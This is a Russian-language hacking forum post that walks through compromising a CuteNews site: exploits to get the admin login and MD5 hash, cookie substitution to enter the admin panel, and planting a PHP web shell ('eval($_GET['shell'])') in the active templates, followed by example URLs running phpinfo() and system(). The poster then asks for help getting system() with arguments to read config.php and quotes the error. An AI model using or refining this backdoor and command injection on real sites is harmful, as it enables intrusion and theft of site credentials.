Блин, люди, а давайте подытожим...???
Короче с помощью сплойтов узнаем логин админа и МД5 хеш...если все зер гуд, то есть шанс двигать дальше...так???
Дальше...подменяем куки при помощи Оперы или Мозилы, или и т.д.
Заходим в админку CuteNews...при удачном раскладе вставляем в активные шаблоны код навроде :
HTML;
if(isset($_GET['shell'])) eval($_GET['shell']);
дальше... сохраняем
ИСПОЛЬЗУЕМ:
_http://site/news/show_news.php?shell=phpinfo();
_http://site/news/show_news.php?shell=system(dir);
ПХПИНФО это конечно хорошо)...а как использовать system()???
dir выводит...а вот system(dir c:\); уже фиг(((
варианты: system(dir+c:\) system("dir c:\") system('dir c:\') system('dir', 'c:\') тоже не дают результата....где-то не догоняю чего-то?
P.S. Например хочу прочитать файл config.php, тогда команда для винды будет type config.php...либо cmd /c type config.php... вобщем любые варианты со скобками и кавычками результата не дают положительного...
Выдает ошибку примерно такую(это если кавычки использовать):
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in C:\Program Files\VertrigoServ\www\news\data\Default.tpl(14) : eval()'d code on line 1 Parse error: syntax error, unexpected $end in C:\Program Files\VertrigoServ\www\news\data\Default.tpl(14) : eval()'d code on line 1